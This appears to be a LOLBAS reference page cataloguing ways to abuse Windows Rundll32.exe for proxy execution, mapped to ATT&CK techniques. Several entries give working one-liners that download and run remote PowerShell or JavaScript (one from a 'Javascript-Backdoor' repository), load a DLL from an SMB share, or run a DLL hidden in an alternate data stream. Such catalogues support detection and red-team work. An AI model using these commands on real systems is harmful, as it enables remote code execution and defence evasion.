.. /Rundll32.exe
Star

Execute (DLL)
Alternate data streams (DLL)

Used by Windows to execute dll files


Paths:

Resources:
Acknowledgements:

Detection:

Execute

  1. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.

    rundll32.exe AllTheThingsx64,EntryPoint
    Use case
    Execute dll file
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218.011
    Tags
    Execute: DLL
    This LOLBAS executes Dynamic-Link Libraries (DLLs).

  2. Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.

    rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
    Use case
    Execute DLL from SMB share.
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218.011
    Tags
    Execute: DLL
    This LOLBAS executes Dynamic-Link Libraries (DLLs).

  3. Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
    Use case
    Execute code from Internet
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218.011

  4. Use Rundll32.exe to execute a JavaScript script that runs calc.exe.

    rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
    Use case
    Proxy execution
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218.011

  5. Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
    Use case
    Proxy execution
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218.011

  6. Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
    Use case
    Execute code from Internet
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218.011

  7. Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.

    rundll32.exe -sta {CLSID}
    Use case
    Execute a DLL/EXE COM server payload or ScriptletURL code.
    Privileges required
    User
    Operating systems
    Windows 10 (and likely previous versions), Windows 11
    ATT&CK® technique
    T1218.011
    Tags
    Execute: DLL
    This LOLBAS executes Dynamic-Link Libraries (DLLs).

Alternate data streams

  1. Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).

    rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
    Use case
    Execute code from alternate data stream
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1564.004
    Tags
    Execute: DLL
    This LOLBAS executes Dynamic-Link Libraries (DLLs).